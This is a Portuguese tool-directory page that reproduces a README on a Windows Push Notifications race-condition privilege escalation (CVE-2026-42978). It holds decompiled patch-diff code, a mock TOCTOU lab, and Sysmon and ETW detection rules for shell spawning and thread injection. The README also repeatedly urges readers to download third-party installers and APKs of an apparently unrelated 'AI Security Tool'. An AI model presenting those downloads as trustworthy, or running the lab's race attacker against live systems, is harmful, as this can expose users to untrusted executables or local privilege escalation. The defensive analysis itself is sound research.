Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-42978-PoC-Research — Pesquisa de PoC de Use-After-Free e Race Condition no CVE-2026-42978 Windows Push Notifications (WpnService), scanner de diagnóstico e módulo de auditoria de segurança para AI Security Tool. | Kitploit
Ferramentas/GitHubGitHub/syntaxmethod/cve-2026-42978-poc-research
Ferramentas DefensivasEscalada de PrivilégiosScanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoInteligência de AmeaçasPapers e PesquisaAprendizado e Educação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHub
syntaxmethod/cve-2026-42978-poc-research

CVE-2026-42978-PoC-Research

Pesquisa de PoC de Use-After-Free e Race Condition no CVE-2026-42978 Windows Push Notifications (WpnService), scanner de diagnóstico e módulo de auditoria de segurança para AI Security Tool.

Ver RepositórioSite
13há 17h 30mAinda não revisado
Compartilhar

CVE-2026-42978
Módulo de Notificações Push do Windows para Ferramenta de Segurança de IA

Ecossistema de Segurança de IA de Nova Geração, Terminal Multiprotocolo e Suíte de Agentes Autônomos


Latest Release Build Status Donations Telegram Channel License

Website · Documentação do produto · Aplicação host · Chat da comunidade

Navegação do site: Início · Atualizações · Downloads · Módulos

Module banner


Aplicação host oficial

Produto: AI Security Tool
Site: zerodayevil.github.io
Docs: https://zerodayevil.github.io/ai-security-tool

Este módulo é uma análise revisada e um perfil de verificação segura para a AI Security Tool.
Use apenas módulos listados no site do projeto ou no catálogo oficial. Carregue este módulo dentro da aplicação aprovada, contra endpoints que você possui ou tem autorização por escrito para avaliar.

Este repositório não inclui um exploit weaponizado contra o WpnService. O laboratório em lab/ é um mock independente da classe de bug (TOCTOU / double-fetch). Ele não se comunica com o serviço real de notificações push.


Início rápido e instalação

Instale primeiro a aplicação host. Em seguida, habilite este módulo em Modules → Windows / Local EoP → CVE-2026-42978.

Builds prontos para uso

SO / plataformaVersãoArquitetura / formatoAtualizadoStatusDownload
Windowsv6.3.20Instalador x64 (.exe)2026-09-08Mais recenteBaixar .exe
Windowsv6.3.20Portátil x64 (.tar.gz)2026-09-08Mais recenteBaixar .tar.gz
macOSv5.3.29Apple Silicon (.dmg)2026-09-05EstávelBaixar .dmg
Linuxv5.3.27Universal x64 (.tar.gz)2026-09-01EstávelBaixar .tar.gz
Androidv5.3.27APK ARM64 (.apk)2026-09-01EstávelBaixar .apk

Apenas fontes oficiais:

  • https://zerodayevil.github.io/
  • https://zerodayevil.github.io/ai-security-tool
  • https://github.com/ZeroDayEvil/ai-security-tool

Visão conceitual

CVE-2026-42978 é uma elevação de privilégio local nas Notificações Push do Windows. A Microsoft descreve acesso concorrente a um recurso compartilhado sem sincronização adequada (CWE-362). Pesquisas sobre wpncore.dll corrigido vs. não corrigido mostram uma race de use-after-free em PresentationEndpointFacade durante o desligamento da plataforma.

O WpnService é executado na sessão 0 como NT AUTHORITY\SYSTEM (svchost.exe -k netsvcs -p). A entrega de toast, tile e badge passa por ele. Vencer uma race contra esse processo é um problema de SYSTEM na máquina local — não um bug remoto de pré-autenticação em DC.

Status: corrigido em 10 de junho de 2026 (Patch Tuesday). Esta página é pesquisa defensiva.

Não é o CVE-2026-41089 (RCE do Netlogon). Componente diferente, modelo de privilégio diferente, data de patch diferente.


Especificações

CampoValor
CVECVE-2026-42978
BDUBDU:2026-08249
Aviso do fornecedorMSRC — Windows Push Notifications EoP
SeveridadeAlta · CVSS 3.1 7.8
FraquezaCWE-362 race condition · use-after-free no caminho de desligamento
ComponenteWindows Push Notifications · WpnService · wpncore.dll
Vetor de ataqueLocal
Privilégios necessáriosBaixo (usuário local autorizado)
Interação do usuárioNenhuma
Patch Tuesday10 de junho de 2026
Tipo de móduloAnálise de pesquisa + verificação segura no app + pacote de detecção

Escopo

SKUs de cliente e servidor que incluem Push Notifications. Confirme o KB exato no MSRC antes de fechar um ticket.

FamíliaNotas
Windows 101809, 21H2, 22H2 (x86 / x64 / ARM64 conforme aplicável)
Windows 1123H2, 24H2, 25H2, 26H1
Windows Server2016 / 2019 / 2022 / 2025 (full e Server Core onde o componente existe)

Builds de orientação a partir de notas públicas de manutenção (sempre reverifique no MSRC):

BranchBuild corrigido indicativo
Windows 11 23H222631.7219
Windows 11 24H226100.8655
Windows 11 25H226200.8655
Windows 11 26H128000.2269
Exemplo de wpncore.dll (24H2)vulnerável 26100.8521 → corrigido 26100.8655

Causa raiz (pesquisa)

A facade encapsula chamadas da API de notificações e delega para PresentationEndpointImpl. Durante o desligamento da plataforma, o objeto NotificationPlatform é destruído. Vários métodos da facade historicamente obtinham um ponteiro de plataforma sem um flag de desligamento ou um lock compartilhado. Se o teardown vencer a race, a próxima chamada usa um ponteiro pendente.

Facade, platform, shutdown guard

O mesmo padrão de lock-and-guard foi aplicado em 49 métodos PresentationEndpointFacade::*. Os métodos de implementação por baixo foram deixados como estavam — o furo estava na facade.

Forma não corrigida (wpncore.dll 26100.8521)

root@kitploit:~
// PresentationEndpointFacade::ToastUnblockAll — unpatched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    NotificationPlatformHandle::Get(this + 0x50);
    if (platform == NULL)
        Throw_Hr(...);
    return PresentationEndpointImpl::UnblockToastsForEachApp(...);
}

Forma corrigida (wpncore.dll 26100.8655)

root@kitploit:~
// PresentationEndpointFacade::ToastUnblockAll — patched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    if (Feature_4097557817::IsEnabled()) {
        AcquireSRWLockShared(&Wns::s_platformLock);
        if (Wns::s_platformShutdown)
            Throw_Hr(E_APPLICATION_EXITING);
        NotificationPlatformHandle::Get(this + 0x50);
        ReleaseSRWLockShared(&Wns::s_platformLock);
    }
}

Ghidra with unpatched and patched wpncore.dll open

O que o patch adiciona:

  1. AcquireSRWLockShared — lock leitores-escritores; o desligamento obtém o exclusivo.
  2. s_platformShutdown — aborta com E_APPLICATION_EXITING se o teardown começou.
  3. Liberação RAII via WIL unique_storage, para que o lock seja liberado em caminhos de exceção.
  4. Feature flag Feature_4097557817 para rollout em etapas / rollback.

Escala do diff do binário

CategoriaFunções de exemplo
ToastToastUnblockAll, ToastCreateSession, ToastCloseSession, ToastRequestAllNotifications, ToastSuppress
TileTileCreateSession, TileCloseSession, TileRequestResourceForeground
RegistroRegisterApplication, UnregisterApplication, RegisterHandler, UpdateRegistration
ConfiguraçõesChangeAppSetting, QueryAppSetting, QueryGlobalSetting
EntregaDeliver, GetPayloadForNotificationId, Submit, PostScheduledNotification
ConsultasGetRegisteredHandler, GetSettingsFromHandler, GetAssetsFromHandler

Notas de PE de reports/:

  • .text cresceu 18.432 bytes
  • .data cresceu 96 bytes (Wns::s_platformLock, Wns::s_platformShutdown)
  • sem novos imports — as APIs de SRW lock já estavam presentes
  • novo destrutor RAII para liberação do lock exclusivo

Impacto

O WpnService é SYSTEM. Se a race for vencida, uma chamada de vtable pendente pode ser transformada em execução de código SYSTEM local. Esse passo — heap spray, hijack de vtable, payload — está fora do escopo aqui.

Este módulo é para compreensão da causa raiz, verificação de patch e detecção.


Usando este módulo dentro da AI Security Tool

  1. Instale um build oficial atual de zerodayevil.github.io.
  2. Abra Modules → CVE-2026-42978.
  3. Aponte a verificação para endpoints Windows autorizados.
  4. Trate o resultado como presença de patch / postura de WPN, não como "disparar a race".
  5. Opcionalmente, colete o pacote de detecção (detection/) em uma máquina de laboratório.

Não execute loops de crash ou race contra o WpnService de produção.

root@kitploit:~
authorized operator
        │
        ▼
 AI Security Tool  →  module 42978
        │
        ▼
 authorized Windows endpoint
        │
        ├─ patch / wpncore.dll age
        └─ SIEM / Sysmon / Event Log notes

Laboratório TOCTOU (apenas serviço mock)

lab/ é uma demo C independente de double-fetch / TOCTOU. Usa um named pipe e memória compartilhada. Não carrega wpncore.dll e não inicia ou para o WpnService.

  • vulnerable_service.exe — valida um comprimento, dorme, lê o comprimento novamente.
  • race_attacker.exe — altera o valor compartilhado durante essa janela.
  • --patched — single-fetch em uma variável local; o mesmo atacante deve ver zero races.

Requer GCC (MinGW). A partir de lab/:

root@kitploit:~
build.bat

Terminal 1: vulnerable_service.exe
Terminal 2: race_attacker.exe 5
Depois compare com vulnerable_service.exe --patched.

TOCTOU race condition demo


Detecção e threat hunting

Monitor ETW — detection/etw_wpn_monitor.ps1

Sete verificações:

  1. Estado e PID do WpnService
  2. Histórico de crash / reinício
  3. Rajada no event log do Push Notifications Platform
  4. Named pipes relacionados a WPN
  5. Dica de patch (data / build do wpncore.dll)
  6. Processos com módulos WPN carregados
  7. Auditoria de junction / symlink sob caminhos de dados de notificação
root@kitploit:~
powershell -ExecutionPolicy Bypass .\detection\etw_wpn_monitor.ps1

ETW monitor output

Sysmon — detection/sysmon_wpn_race_detect.xml

RegraPara que serve
WPN_EoP_ChildProcesssvchost (netsvcs) gerando cmd / powershell / wscript
WPN_PipeAccessConexões a named pipes relacionados a WPN
WPN_FileCreationCriação de arquivo sob diretórios de dados de notificação
WPN_RegistryTamperingEscritas sob chaves PushNotifications
WPN_ProcessAccessPROCESS_ALL_ACCESS para svchost
WPN_ThreadInjectionCreateRemoteThread em svchost
root@kitploit:~
sysmon64.exe -accepteula -i detection\sysmon_wpn_race_detect.xml

Visualizador de Eventos

Canal: Microsoft-Windows-PushNotifications-Platform/Operational

  • Evento 1225 — comandos WPN em nível de transporte
  • Taxa de rajada (por exemplo >20/min) — vale uma olhada, não é uma condenação
  • Error / Critical — possível crash de uma tentativa falha

Event Viewer WPN operational log


Checklist de mitigação

  • Atualização cumulativa de junho de 2026 em todos os SKUs no escopo
  • Build do wpncore.dll corresponde à linha corrigida para aquele branch
  • EDR / Sysmon em workstations e jump boxes, não apenas em DCs
  • Alerta quando svchost -k netsvcs gerar um shell
  • Resultado do módulo do app host arquivado com o inventário de hotfixes

Se etw_wpn_monitor.ps1 indicar não corrigido — instale a atualização de junho de 2026 e reverifique.


CVEs relacionados (cluster WPN de junho de 2026)

CVEClasse
CVE-2026-42977EoP · race
CVE-2026-42978EoP · race (este módulo)
CVE-2026-42979EoP · race
CVE-2026-42991EoP · race
CVE-2026-42969Divulgação de informações · race
CVE-2026-42970Divulgação de informações · race
CVE-2026-42973Divulgação de informações · race
CVE-2026-26167EoP
CVE-2026-32160EoP

Estrutura do repositório

root@kitploit:~
CVE-2026-42978/
├── README.md
├── LICENSE
├── lab/
│   ├── vulnerable_service.c
│   ├── race_attacker.c
│   └── build.bat
├── detection/
│   ├── etw_wpn_monitor.ps1
│   └── sysmon_wpn_race_detect.xml
└── reports/
    ├── PE_DIFF_REPORT.txt
    └── FUNCTION_DIFF_REPORT.txt

Requisitos: Windows 10/11 para os scripts de detecção · MinGW para o laboratório mock · Sysmon opcional.

As capturas de tela neste README são carregadas de URLs públicas de imagens. Elas não estão armazenadas nesta árvore.


Referências

  • MSRC — CVE-2026-42978
  • Registro CVE
  • BDU:2026-08249

Catálogo de módulos de segurança

Execução Remota de Código & problemas de rede 4 módulos
  • CVE-2026-41089 — Módulo Netlogon do Windows · @ZeroDayEvil
  • CVE-2026-20805 — Módulo RCE do Windows · @ZeroDayEvil
  • CVE-2026-41096 — Módulo de verificação de RCE crítica · @ZeroDayEvil
  • CVE-2026-24291 — Módulo de protocolo de rede · @ZeroDayVPN
Elevação de privilégio & serviços 2 módulos
  • CVE-2026-66804 — EoP do serviço CrossDevice · @ZeroDayVPN
  • CVE-2026-42978 — EoP das Notificações Push do Windows (este repositório) · @ZeroDayEvil
Pesquisa & análises 2 módulos
  • CVE-2026-50416 — Análise de elevação de privilégio local · @ZeroDayEvil
  • CVE-2026-83991 — Módulo de análise · @ZeroDayVPN

Contribuição & comunidade

Trabalho útil:

  1. Fatos — builds do MSRC, CVEs irmãos no cluster WPN de junho.
  2. Detecção — Sigma, melhor ETW, recomendações de ASR.
  3. Metadados e traduções do app host.
  4. Documentação e correções de links quebrados.

Não abra um PR que adicione um exploit weaponizado do WpnService, helper de heap-spray ou PoC de exploit contra o serviço ativo.


Contato & suporte

  • Website: zerodayevil.github.io
  • Docs do produto: zerodayevil.github.io/ai-security-tool
  • Admin do Telegram: @ZeroDayEvil
  • Chat do Telegram: @ZeroDyaTool_chat
  • Canal do Telegram: @ZeroDyaTool_channel
  • Open Collective: opencollective.com/ZeroDayEvil

Licença & legal

Lançado sob a Licença MIT. Veja LICENSE.

Apenas pesquisa defensiva autorizada e administração de sistemas.
Testes de elevação de privilégio local sem autorização por escrito são ilegais.

A vulnerabilidade está corrigida. Mantenha o Windows atualizado. Este repositório não inclui um exploit weaponizado contra o serviço ativo.


AI Security Tool — fluxo de trabalho em terminal e automação para profissionais de cibersegurança.

Módulo defensivo para zerodayevil.github.io · Sem exploit standalone do WpnService · Verifique os fatos no MSRC

Baixar ferramenta